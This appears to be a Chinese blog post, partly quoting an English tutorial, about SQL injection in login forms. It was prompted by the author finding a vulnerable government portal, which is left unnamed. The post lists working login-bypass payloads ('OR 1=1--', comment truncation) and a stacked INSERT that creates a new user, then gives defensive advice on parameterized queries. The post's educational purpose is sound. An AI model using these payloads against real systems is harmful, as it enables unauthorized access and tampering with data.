from表单input输入SQL注入问题

最近登录一地方政府门户的信息查询系统，发现简单的SQL注入就能直接查到数据库的信息。大为震惊！具体哪个网站就不透露了。。。

网上搜了一些，已备查阅。

1.构建简单SQL注入登陆

用户名输入：test' or ''='

密码输入：' or ''='

或者

用户名输入：test

密码输入：' or ''='

Making the SQL Injection Requests

 

Now onto the fun part. Let's say we have a user 'Foo' with password 'foo' in our Users table for the purpose of this exercise.

1 Trying an invalid user/password. 

2 Bypassing login for a known user. Let's say we know user 'Foo' exists. 

Username: Foo'-- 
Password: junk 

By using '--' for commenting out the rest of the conditions in the query we have been able to skip password validation for user 'Foo' 

3Bypassing login for unknown user. Let's say we don't know any user on the site. 

Username: ' OR 1=1-- 
Password: junk 

We used a tautology (1=1) to bypass all security checks. Notice that I know have the order information for *all* users. 

4 Injecting a new user. Let's say I want to add a user 'Hijack' with password 'This'. 

Username: ';INSERT INTO Users VALUES (100,'Hijack','This')-- 
Password: junk 

 

But now using those credentials succeeds. 

 

 

到这里快要崩溃了！

想想自己做的网站吧。。。⊙﹏⊙b汗

 

最后老外给出了建议，看一看吧：

Conclusion

 

It is quite easy to see how quickly one can invade a system through the use of SQL injection. The million dollar question is "How do I protect myself "? The answer is, follow best practices.

• Sanitize your input using both black lists and white lists.
• Use parameterized SQL and NEVER use string concatenation to generate queries.
• Protect your database resources wisely and use the notion of "least privilege" to access information.

 

Hope this helped in making SQL injection a more concrete issue to protect your applications against, rather than a buzz word.

 

 

参考：

SQL注入速查表（上）

http://drops.wooyun.org/tips/7840

 

http://blogs.iis.net/nazim/sql-injection-demo

 

http://www.unixwiz.net/techtips/sql-injection.html